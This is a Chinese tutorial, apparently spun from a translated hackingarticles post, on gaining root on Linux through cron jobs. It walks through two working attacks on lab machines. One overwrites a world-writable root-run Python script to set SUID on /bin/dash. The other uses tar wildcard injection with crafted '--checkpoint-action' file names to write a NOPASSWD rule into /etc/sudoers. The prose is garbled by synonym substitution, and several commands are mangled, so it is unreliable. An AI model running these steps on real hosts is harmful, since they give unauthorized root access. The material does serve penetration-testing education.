快捷搜索:  网络  后门  CVE  渗透  木马  扫描  黑客  as

手艺分享 | 怎么样使用Cron Jobs完成Linux提权

1.png

写在前面的话

今天给各位渗透排泄测试同行们提供一种Linux提权要领,在这篇文章中,我们将先容怎么样使用Cron Jobs来完成Linux下的权限抬举,并获取遥程主机的root走访权。

Cron Jobs能做什么?

Cron Jobs可以在服务器端实现一系列计划义务(设准时间自动执行命令等等),一般它首要用于执行体系治理员义务,例如数据备份或清理缓存目录等等。Cron这个词来源于“crontab”,黑客网,而这个玩意儿存在于/etc目录中。

2.png

譬如说,在crontab中,我们添加如下条目来完成每一隔一个小时就自动打印出apache的错误日记“

1 0 ** * printf "" > /var/log/apache/error_log

Crontab文件重写

配置简陋设置的Cron义务

目标:在crontab的帮助下,配置一个新的义务来运行目标Python脚本,并清除指定目录中的整个数据。

假设目录名称为“cleanup“,它的数据每一隔两分钟就会被自动清空一次。在最先之前我们需要在/home/cleanup中存储一些数据:

mkdir cleanup
cd cleanup
echo "hello freinds" > 1.txt
echo "ALL files will be deleted in 2 mints" > 2.txt
echo "" > 1.php
echo "" > 2.php
ls

3.png

接下来,编写一个Python脚原先删除/home/cleanup目录中的数据,我们需要给这个脚本完备的r/w/x权限。

切换目录并创建脚本:

cd /tmp
nano cleanup.py

脚本代码:

#!/usr/bin/envpython
import os
import sys
try:
os.system('rm -r /home/cleanup/* ')
except:
sys.exit()

赋予权限:

chmod 777 cleanup.py

4.png

最后配合crontab配置计划义务,并每一隔两分钟运行一次cleanup.py :

nano /etc/crontab
*/2*   * * *   root    /tmp /cleanup.py

5.png

验证效果:

cd /home/cleanup
ls
date
ls

6.png

人人可以看到数据每一隔两分钟就会被清空一次。

渗透排泄行使

开启你的攻击设备,然后入侵目标体系,接下来直接进到提权步骤。假设我们已经通过ssh成功登录了目标设备,并走访了非root用户终端,然后执行下列命令:

cat /etc/crontab
ls -al /tmp/cleanup.py
cat /tmp/cleanup.py

我们此时可以发现,crontab每一隔两分钟便会运行一次Python脚本,我们待会儿需要行使这一点。

7.png

启用/bin/dash的SUID,使用nano关上cleanup.py ,并将其中的“rm -r /tmp/*”替代成如下内容:

os.system('chmod u+s /bin/dash')

8.png

两分钟以后,它将会给/bin/dash配置SUID权限,运行以后你就能拿到root权限了:

/bin/dash
id
whoami

9.png

Crontab Tar通配符注入

环境搭建

目标:在crontab的帮助下配置一个计划义务,备份HTML目录中的tar文档。

注意,该目录需要具备可执行权限(x)。

10.png

然后每一隔一分钟将/html目录中的tar文件备份到/var/backups中:

nano /etc/crontab
*/1*   * * *   root tar -zcf /var/backups/html.tgz/var/www/html/*

11.png

执行如下命令查看运行效果:

cd /var/backup
ls
date

从下图中我们可以看到,一分钟以后html.tgz文件已经生成了:

12.png

后渗透排泄行使

开启你的攻击设备,然后入侵目标体系,接下来直接进到提权步骤。假设我们已经通过ssh成功登录了目标设备,并走访了非root用户终端。接下来,关上crontab查看计划义务是否已经配置成功:

cat /etc/crontab

13.png

执行如下命令来授权sudo权限,并登录用户账号,即完成通配符注入:

echo'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers'>test.sh
echo"" > "--checkpoint-action=exec=sh test.sh"
echo"" > --checkpoint=1
tarcf archive.tar *

一分钟以后,它将会给用户ignite赋予sudo权限:

sudo -l
sudo bash
whoami

14.png

* 参考来源:hackingarticles,Alpha_pck编译,

您可能还会对下面的文章感兴趣: